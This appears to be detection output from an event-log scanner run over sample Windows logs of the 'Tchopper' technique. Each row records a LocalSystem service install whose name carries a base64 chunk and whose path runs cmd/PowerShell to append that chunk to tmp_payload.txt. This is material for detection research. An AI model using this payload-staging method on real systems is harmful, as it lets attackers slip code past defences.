2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
